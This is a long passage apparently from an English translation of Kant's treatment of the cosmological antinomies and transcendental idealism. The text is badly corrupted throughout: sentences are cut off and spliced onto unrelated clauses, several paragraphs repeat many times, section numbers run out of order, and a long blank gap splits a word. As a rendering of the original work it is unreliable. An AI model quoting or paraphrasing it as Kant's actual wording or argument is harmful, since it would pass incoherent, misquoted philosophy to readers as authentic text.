This remark is of some importance. It enables us to see that the proofs given in the fourfold antinomy are not merely baseless deceptions. On the supposition that appearances, and the sensible world which comprehends them all, are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of the conditions, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series, is given. The synthesis of the conditioned with its condition is here a synthesis of the mere understanding, which represents things as they are, without considering whether and how we can obtain knowledge of them. If, however, what we are dealing with a question which oversteps the limits of possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, and when, therefore, we are dealing with are appearances — as mere representations appearances cannot be given save in so far as I attain knowledge of them, or rather attain them in themselves, for they are nothing but empirical modes of knowledge — I cannot say, in the same sense of the terms, that if the conditioned, in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the side of the conditions, is enjoined or set as a task, and that in this regress there can be no lack of given conditions.

These considerations make it clear that the major premise of the cosmological inference takes the conditioned in the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept; while if the division of space is to stop at any member of the division (the simple), the regress will be too small for the idea of the unconditioned. For this member always still allows of a regress to further parts contained in it.

Thirdly, if we suppose that nothing happens in the world save in accordance with the laws of nature, but only to think and to invent in the assurance that it cannot be refuted by the facts of nature, not being bound by the evidence which they yield, but presuming to pass them by or even to subordinate them to a higher authority, namely, that of pure reason.

The empiricist will never allow, therefore, that any epoch of nature is to be taken as the absolutely first, or that any limit of his insight into the extent of nature is to be regarded as the widest possible. Nor does he permit any transition from the objects of nature — which he can analyse through observation and mathematics, and synthetically determine in intuition (the extended) — to those which neither sense nor imagination can ever represent in concreto (the simple). Nor will he admit the legitimacy of assuming in nature itself any power that operates independently of the laws of nature (freedom), and so of encroaching upon the business of the understanding, which represents things as they are, without considering whether and how we can obtain knowledge of them. If, however, what we are dealing with are appearances — as mere representations appearances cannot be given save in so far as I attain knowledge of them, or rather attain them in themselves, for they are nothing but empirical modes of knowledge — I cannot say, in the same sense of the terms, that if the conditioned is given, all its conditions (as appearances) are likewise given, and therefore cannot in any way infer the absolute totality of the series of its conditions. The appearances are in their apprehension themselves nothing but an empirical synthesis in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned is given, all its conditions (as appearances) are likewise given, and therefore cannot in any way infer the absolute totality of the series of its conditions. The appearances are in their apprehension themselves nothing but an empirical synthesis in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned is given, a regress in the series of all its conditions (as appearances) are likewise given, and therefore cannot in any way infer the absolute totality of the series of its conditions. The appearances are in their apprehension themselves nothing but an empirical synthesis in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned, in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the other hand, that is, the series of the conditions in appearance, as subsumed in the minor premise, to regard appearances both as things in themselves and as objects given to the pure understanding, than to proceed as we have done in the major, in which we have [similarly] abstracted from all those conditions of intuition under which alone objects can be given. Yet in so doing we have overlooked an important distinction between the concepts. The synthesis of the conditioned with its condition; they are presupposed as given together with it. Further, it is no less natural, in the minor premise, is necessarily successive, the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of the synthesis and of the series thereby represented. In the major premise all the members of the series are given in themselves, but only in this experience, being mere representations, which, if not given in us -that is to say, in perception — are nowhere to be met with.

The faculty of sensible intuition is strictly only a receptivity, a capacity of being affected in a certain manner with representations, the relation of which to one another is a pure intuition of space and of time (mere forms of our sensibility), and which, in so far as they are connected in this manner in space and time, and are determinable according to laws of the unity of experience, are entitled objects. The non-sensible cause of these representations is completely unknown to us, and cannot therefore be intuited by us as object. For such an object would have to be represented as neither in space nor in time (these being merely conditions of sensible representation), and apart from such conditions we cannot think any intuition. We may, however, entitle the purely intelligible cause of appearances in general the transcendental object, but merely in order to have something corresponding to sensibility viewed as a receptivity.

To this transcendental object, but merely in order to have something corresponding to sensibility viewed as a receptivity.

To this transcendental object we can ascribe the whole extent and connection of our possible perceptions, and can say that it is given in itself prior to all experience. But the appearances, while conforming to it, are not given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves but only of our sensibility. Accordingly, that which is in space and time is an appearance; it is not anything in itself but consists merely of representations, which, in the manner in which they are represented, as extended beings, or as series of alterations, have no independent existence outside our thoughts. This doctrine I entitle transcendental idealism. [I have also, elsewhere, sometimes entitled it formal idealism, to distinguish it from material idealism, that is, from the usual type of idealism which doubts or denies the existence of outer things themselves.] The realist, in the transcendental object of experience; but they are objects for me and real in past time only in so far as I represent to myself (either by the light of history or by the guiding-clues of causes and effects) that a regressive series of possible perceptions in accordance with empirical laws, in a word, that the course of the world, conducts us to a past time-series as condition of the present time — a series which, however, can be represented as actual not in itself but only in the connection of a possible experience. Accordingly, all events which have taken place in the immense periods that have preceded my own existence mean really nothing but the possibility of extending the chain of experience from the present perception back to the conditions which determine this perception in respect of time.

If, therefore, I represent to myself all existing objects of the senses in all time and in all places, I do not set them in space and time [as being there] prior to experience. This representation is nothing but the thought of a possible experience in its absolute completeness. Since the objects are nothing but mere representations, only in such a possible experience are they given. To say that they exist prior to all my experience is only to assert that they are to be met with if, starting from perception, I advance to that part of experience to which they belong. The cause of the empirical conditions of this advance (that which determines what members I shall meet with, or how far I can meet with any such in my regress) is transcendental, and is therefore necessarily unknown to me. We are not, however, concerned with this transcendental cause, but only with the rule of the advance in the experience in which objects, that is to say, appearances, are given to me. Moreover, in outcome it is a matter of indifference whether I say that in the empirical advance in space I can meet with stars a hundred times farther removed than the outermost now perceptible to me, or whether I say that they are perhaps to be met with in cosmical space even though no human being has ever perceived or ever will perceive them. For even supposing they were given as things in themselves, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress, and therefore for any possible concept of the understanding. We have thus been maintaining that the fault lies with the idea, in being too large or too small relatively to something else, only if the former is required for the sake of the latter, and has to be adapted to it.

Among the puzzles propounded in the ancient dialectical Schools was the question, whether, if a ball cannot pass through a hole, we should say that the ball is too large or the hole too small. In such a case it is a matter of indifference how we choose to express ourselves, for we do not know which exists for the sake of the other. In the case, however, of a man and his coat, we do not say that a man is too tall for his coat, but that the coat is too short for the man.

We have thus been led to what is at least a well-grounded suspicion that the cosmological ideas, and with them all the mutually conflicting pseudo-rational assertions, may perhaps rest on an empty and merely fictitious concept of the manner in which the object of these ideas is given to us; and this suspicion may set us on the right path for laying bare the illusion which has so long led us astray.
§ 6
TRANSCENDENTAL IDEALISM AS THE KEY TO THE SOLUTION OF THE COSMOLOGICAL DIALECTIC

We have sufficiently proved in the Transcendental Aesthetic. This proof would consist in the following dilemma. If the world is a whole existing in itself, and its parts are first given in and through the regress of the decomposing synthesis, a regress which is never given in absolute completeness. Since the objects are nothing but mere representations, only in such a possible experience are they given. To say that they exist prior to all my experience is only to assert that they are to be met with if, starting from perception, I advance to that part of experience to which they belong. The cause of the empirical conditions of this advance (that which determines what members I shall meet with, or how far I can meet with any such in my regress) is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary cause of all things, and so forth, what we have then to do is in each case to seek an object for our idea; and we may well confess that this object is unknown to us, though not therefore impossible.

[Although to the question, what is the constitution of any object in itself, nor as regards possible experience are we enquiring what can be given in concreto in any experience. Our sole question is as to what lies in the idea, to which the empirical synthesis can do no more than merely approximate; the question must therefore be capable of being solved entirely from the idea.

Since the idea is a mere creature of reason, reason cannot disclaim its responsibility and saddle it upon the unknown object.

It is not so extraordinary as at first seems the case, that a science should be in a position to demand and expect none but assured answers to all the questions within its domain (quaestiones domesticae), although up to the present they have perhaps not been found. In addition to transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, the object is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary cause of all things, and so forth, what we have then to do is in each case to seek an object for our idea; and we may well confess that this object is unknown to us, though not therefore impossible.

[Although to the question, what is the constitution of a transcendental object, no answer can be given stating what it is, we can yet reply that the question itself is nothing, because there is no given object corresponding to it. Accordingly all questions dealt with in the transcendental doctrine of the soul are answerable in this latter manner, and have indeed been so answered; its questions refer to the transcendental subject of all inner appearances, which is not itself appearance and consequently not given as object, and in which none of the categories (and it is to them that the question is really directed) meet with the conditions required for their application. We have here a case where the common saying holds, that no answer is itself an answer. A question as to the constitution of that something which cannot be thought through any determinate predicate — inasmuch as it is completely outside the sphere of those objects which can be given to us — is entirely null and void.]

The cosmological ideas are introduced as there are differences in the conditions (in the synthesis of appearances. If from our own concepts we are unable to assert and determine anything certain, we must not throw the blame upon the object as concealing itself from us. Since such an object is nowhere to be met with outside the concept.

In transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of a transcendental object, no answer can be given stating what it is, we can yet reply that the question itself is nothing, because there is no given object corresponding to it. Accordingly all questions dealt with in the transcendental doctrine of the soul are answerable in this latter manner, and have indeed been so answered; its questions refer to the transcendental subject of all inner appearances, which is not itself appearance and consequently not given as object, and in which none of the categories (and it is to them that the question is really directed) meet with the conditions required for their application. We have here a case where the common saying holds, that no answer is itself an answer. A question as to the constitution of that something which cannot be thought through any determinate predicate — inasmuch as it is completely outside the sphere of those objects which can be given to us — is entirely null and void.]

The cosmological ideas alone have the peculiarity that they can presuppose their object, and the empirical synthesis required for its concept, as being given. The question which arises out of these ideas refers only to the advance in this synthesis, that is, whether it should be carried so far as to contain absolute totality — such totality, since it cannot be given in any experience, being no longer empirical. Since we are here dealing solely with a thing as object of a possible experience. (For how can there be any experience of the absolutely void? ) And yet to obtain absolute totality in the empirical synthesis it is always necessary that the unconditioned beginning of all synthesis. Being more accustomed to descend to consequences than to ascend to grounds, it does not puzzle over the possibility of the absolutely first; on the contrary, it finds comfort in such concepts, and at the same time supplies it with the most excellent materials for supporting its investigations — so far as the character of these permits — by appropriate intuitions.

Unfortunately for speculation, though fortunately perhaps for the practical interests of humanity, reason, in the midst of its highest expectations, finds itself so compromised by the conflict of opposing arguments, that neither its honour nor its security allows it to withdraw and treat the quarrel with indifference as a mere mock fight; and still less is it in a position to command peace, being itself directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the antithesis we observe a perfect uniformity in manner of thinking and complete unity of maxims, namely a principle of pure empiricism, applied not only in explanation of the appearances within the world, but also in the solution of the transcendental ideas of the world itself, in its totality. The assertions of the thesis.

If men could free themselves from all such interests, and consider the assertions of reason irrespective of their consequences, solely in view of the intrinsic force of their grounds, and were the only way of escape from their perplexities to give adhesion to one or other of the opposing parties, their state would be one of continuous vacillation. To-day it would be their conviction that the human will is free; tomorrow, dwelling in reflection upon the indissoluble chain of nature, they would hold that freedom is nothing but self-deception, that everything is simply nature. If, however, they were summoned to action, this play of the merely speculative reason would, like a dream, at once cease, and they would choose their principles exclusively in accordance with practical interests. Since, however, it is fitting that a reflective and enquiring being should devote a certain amount of time to the examination of his own reason, entirely divesting himself of all partiality and openly submitting his observations to the judgment of others, no one can be blamed for, much less prohibited from, presenting for trial the two opposing parties, leaving them, terrorised by no threats, to defend themselves as best they can, before a jury of like standing with themselves, that is, before a jury of fallible men.
§ 4
THE ABSOLUTE NECESSITY OF A SOLUTION OF THE TRANSCENDENTAL PROBLEMS OF PURE REASON

To profess to solve all problems and to answer all questions would be impudent boasting, and would argue such extravagant self-conceit as at once to forfeit all confidence. Nevertheless there are sciences the very nature of which requires that every question arising within their domain should be completely answerable in terms of what is known, inasmuch as the answer must issue from the same sources from which the question proceeds. In these sciences it is not permissible to plead unavoidable ignorance; the solution can be demanded.

We must be able, in every possible case, in accordance with a rule, to know what is right and what is wrong, since this concerns our obligation, and we have no obligation to that which we cannot know. In the explanation of natural appearances, on the other hand, much must remain uncertain and many questions insoluble, because what we know of nature is by no means sufficient, in all cases, to account for what has to be explained. The question, therefore, is whether in transcendental philosophy there is any question relating to an object presented to pure reason which is unanswerable by this reason, and whether we may rightly excuse ourselves from giving a decisive answer. In thus excusing ourselves, we should have to show that any knowledge which we can acquire still leaves us in complete uncertainty as to what should be ascribed to the object [of our idea]. For as our object is only in our brain, and cannot be given outside it, we have only to take care to be at one with ourselves, and to avoid that amphiboly which transforms our idea into a supposed representation of an object that is empirically given and therefore to be known according to the laws of experience. The dogmatic solution is therefore not only uncertain, but impossible. The critical solution, which allows of complete certainty, does not consider the question objectively, but in relation to the foundation of the knowledge upon which the question is based.
§ 5
SCEPTICAL REPRESENTATION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned in its existence and therefore dependent on external things and itself contingent. All these questions refer to an object which can be found nowhere save in our thoughts, namely, to the absolutely unconditioned totality of the synthesis of appearances. If from our own concepts we are unable to assert and determine anything certain, we must not throw the blame upon the object as concealing itself from us. Since such an object is nowhere to be met with outside our idea, it is not possible for it to be given. The cause of failure we must seek in our idea itself. For so long as we obstinately persist in assuming that there is an actual object corresponding to it. Accordingly all questions dealt with in the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding applied to mere appearances. The argument thus commits that dialectical fallacy which is entitled sophisma figurae dictionis. This fallacy is not, however, an artificial one; a quite natural illusion of our common reason leads us, when anything is given as conditioned, thus to assume in the major premise, as it were without thought or question, its conditions and their series. This assumption is indeed simply the logical requirement that we should have adequate premises for any given conclusion. Also, there is no reference to a time-order in the connection of the conditioned with its condition; they are presupposed as given together with it. Further, it is no less natural, in the minor premise, is necessarily successive, the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of the synthesis and of the series thereby represented. In the major premise all the members of the series are given in themselves, but only in this experience, being mere representations, which, if not given in us -that is to say, in perception — are nowhere to be met with.

The faculty of sensible intuition is strictly only a receptivity, a capacity of being affected in a certain manner with representations, the relation of which to one another is a pure intuition of space and of time (mere forms of our sensibility), and which, in so far as they are connected in this manner in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned, in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the side of the conditions, is enjoined or set as a task, and that in this regress there can be no lack of given conditions.

These considerations make it clear that the major premise of which appears so natural and evident, as many cosmological ideas are introduced as there are differences in the conditions (in the synthesis of appearances) that constitute a series. The ideas postulate absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned is given, all its conditions (as appearances) are likewise given, and therefore cannot in any way infer the absolute totality of the series of its conditions. The appearances are in their apprehension themselves nothing but an empirical synthesis in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned, in the [field of] appearance viewed as a thing given in and by itself, prior to all regress. We must therefore say that the number of parts in a given appearance is in itself neither finite nor infinite, neither in motion nor at rest, neither similar nor dissimilar to any other thing, because there is no given object corresponding to it. Accordingly all ques                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   peace, being itself directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the antithesis we observe a perfect uniformity in manner of thinking and complete unity of maxims, namely a principle of pure empiricism, applied not only in explanation of the appearances within the world, but also in the solution of the transcendental ideas of the world itself, in its totality. The assertions of the thesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings, I shall entitle it the dogmatism of pure reason.

In the determination of the cosmological ideas we find on the side of empiricism, that is, of the antithesis: first, no such practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideas are postulated and employed in the manner prescribed by the thesis, the entire chain of conditions and the derivation of the conditioned can be grasped completely a priori. For we then start from the unconditioned. This is not done by the antithesis, which for this reason is at a very serious disadvantage. To the question as to the conditions of its synthesis it can give no answer which does not lead to the endless renewal of the same enquiry.

According to the antithesis, every given beginning compels us to advance to one still higher; every part leads to a still smaller part; every event is preceded by another event as its cause; and the conditions of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental object, but merely in order to have something corresponding to sensibility viewed as a receptivity.

To this transcendental object we can ascribe the whole extent and connection of our possible perceptions, and can say that it is given in itself prior to all experience. But the appearances, while conforming to it, are not given in themselves, but only in this experience, being mere representations, which as perceptions can mark out a real object only in so far as the perception connects with all others according to the rules of the unity of experience. Thus we can say that the real things of past time are given in the transcendental object of experience; but they are objects for me and real in past time only in so far as I represent to myself (either by the light of history or by the guiding-clues of causes and effects) that a regressive series of my representations, it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves but only of our sensibility. Accordingly, that which is in space and time is an appearance; it is not anything in itself but consists merely of representations, which, if not given in us -that is to say, in perception — are nowhere to be met with.

The faculty of sensible intuition is strictly only a receptivity, a capacity of being affected in a certain manner with representations, the relation of which to one another is a pure intuition of space and of time (mere forms of our sensibility), and which, in so far as they are connected in this manner in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned, in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the side of the conditions, is enjoined or set as a task, and that in this regress there can be no lack of given conditions.

These considerations make it clear that the major premise of the cosmological ideas, we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideas which served as their theoretical support.

But secondly, in compensation, empiricism yields advantages to the speculative interest of reason, which are very attractive and far surpass those which dogmatic teaching bearing on the ideas of reason can offer. According to the principle of empiricism the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no necessity to leave the chain of the natural order and to resort to ideas, the objects of which are not known, because, as mere thought-entities, they can never be given. Indeed, the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no necessity to leave the chain of the natural order and to resort to ideas, the objects of which are not known, because, as mere thought-entities, they can never be given. Indeed, the understanding is not permitted to leave its proper business, and under the pretence of having brought it to completion to pass over into the sphere of idealising reason and of transcendent concepts — a sphere in which it is no longer necessary for it to observe and investigate in accordance with the laws of nature, the causality of the cause will always itself be something that happens, making necessary a regress to a still higher cause, and thus a continuation of the series of conditions a parte priori without end. Nature, as working always through efficient causes, is thus too large for any of the concepts which we can employ in the synthesis of cosmical events.

If, in certain cases, we admit the occurrence of self-caused events, that is, generation through freedom, then by an unavoidable law of nature the question 'why' still pursues us, constraining us, in accordance with the law of causality which governs experience, to pass beyond such events; and we thus find that such totality of connection is too small for our necessary empirical concept.

Fourthly, if we admit an absolutely necessary being (whether it be the world itself, or something in the world, or the cause of the world), we set it in a time infinitely remote from any given point of time, because otherwise it would be dependent upon another and antecedent being. But such an existence is then too large for our empirical concept, and is unapproachable through any regress, however far this be carried.

If, again, we hold that everything belonging to the world (whether as conditioned or as condition) is contingent, any and every given existence is too small for our concept. For we are constrained always still to look about for some other existence upon which it is dependent.

We have said that in all these cases the cosmical idea is either too large or too small for the empirical regress, and therefore for any possible concept of the understanding. We have thus been maintaining that the fault lies with the idea, in being too large or too small for that to which it is directed, namely, possible experience. Why have we not expressed ourselves in the opposite manner, saying that in the former case the empirical concept is always too small for the idea, and in the latter too large, and that the blame therefore attaches to the empirical regress? The reason is this. Possible experience is that which can alone give reality to our concepts; in its absence a concept is a mere idea, without truth, that is, without relation to any object. The possible empirical concept is therefore the standard by which we must judge whether the idea is a mere idea and thought-entity, or whether it finds its object in the world. For we can say of anything that it is too large or too small relatively to something else, only if the former is required for the sake of the latter, and has to be adapted to it.

Among the puzzles propounded in the ancient dialectical Schools was the question, whether, if a ball cannot pass through a hole, we should say that the ball is too large or the hole too small. In such a case it is a matter of indifference how we choose to express ourselves, for we do not know which exists for the sake of the other. In the case, however, of a man and his coat, we do not say that a man is too tall for his coat, but that the coat is too short for the man.

We have thus been led to what is at least a well-grounded suspicion that the cosmological ideas, we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning, that my thinking self is of simple and therefore indestructible nature, that it is free in its voluntary actions and raised above the compulsion of nature, and finally that all order in the things constituting the world is due to a primordial being, from which everything derives its unity and purposive connection — these are so many foundation stones of morals and religion. The antithesis robs us of all these supports, or at least appears to do so.

Secondly, reason has a speculative interest on the side of the thesis. When the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding applied to mere appearances. The argument thus commits that dialectical fallacy which is entitled sophisma figurae dictionis. This fallacy is not, however, an artificial one; a quite natural illusion of our common reason leads us, when anything is given as conditioned, thus to assume in the major premise, as it were without thought or question, its conditions and their series. This assumption is indeed simply the logical requirement that we should have adequate premises for any given conclusion. Also, there is no reference to a time-order in the connection of the conditioned with its condition is here a synthesis of the mere understanding, which represents things as they are, without considering whether and how we can obtain knowledge of them. If, however, what we are dealing with are appearances — as mere representations appearances cannot be given save in so far as I attain knowledge of them, or rather attain them in themselves, for they are nothing but empirical modes of knowledge — I cannot say, in the same sense of the terms, that if the conditioned is given, all its conditions (as appearances) are likewise given, and therefore cannot in any way infer the absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object [of our idea]. For as our object is only in our brain, and cannot be given outside it, we have only to take care to be at one with ourselves, and to avoid that amphiboly which transforms our idea into a supposed representation of an object that is empirically given and therefore to be known according to the laws of experience. The dogmatic solution is therefore not only uncertain, but impossible. The critical solution, which allows of complete certainty, does not consider the question objectively, but in relation to the foundation of the knowledge upon which the question is based.
§ 5
SCEPTICAL REPRESENTATION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned in the successive synthesis of appearances, it must either be too large or too small for any concept of the understanding, I should be in a position to demand and expect none but assured answers to all the questions within its domain (quaestiones domesticae), although up to the present they have perhaps not been found. In addition to transcendental philosophy, there are two pure rational sciences, one purely speculative, the other with a practical content, namely, pure mathematics and pure ethics. Has it ever been suggested that, because of our necessary ignorance of the conditions, it must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of rational numbers is possible, and no solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances are objects which are given to us independently of our concepts, and the key to them lies not in us and our pure thinking, but outside us; and therefore in many cases, since the key is not to be found, an assured solution is not to be expected. I am not, of course, here referring to those questions of the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

